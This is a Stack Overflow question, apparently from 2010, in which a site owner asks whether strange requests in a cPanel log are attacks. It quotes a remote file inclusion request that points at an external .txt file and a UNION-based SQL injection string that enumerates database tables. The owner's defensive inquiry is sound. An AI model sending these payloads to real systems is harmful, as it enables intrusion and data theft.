Is this an injection attempt or a normal request?

Posted by CheeseConQueso on Stack Overflow See other posts from Stack Overflow or by CheeseConQueso
Published on 2010-05-04T17:38:37Z Indexed on 2010/05/04 17:48 UTC
Read the original article Hit count: 214

Filed under:
|
|
|

In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:

/?x=19&y=15

The numbers are random, but its always setting x and y variables.

Another category of mysterious requests:

/?id=http://nic.bupt.edu.cn/media/j1.txt??

There are other attempts at injections in the request log that have straight sql written into them as well. Example:

 /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--

It looks like they are all reaching a 404, but I'm still wondering about the intent behind these.

I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason.

Any suggestions as to what all these are?

© Stack Overflow or respective owner

Related posts about sql-injection

Related posts about php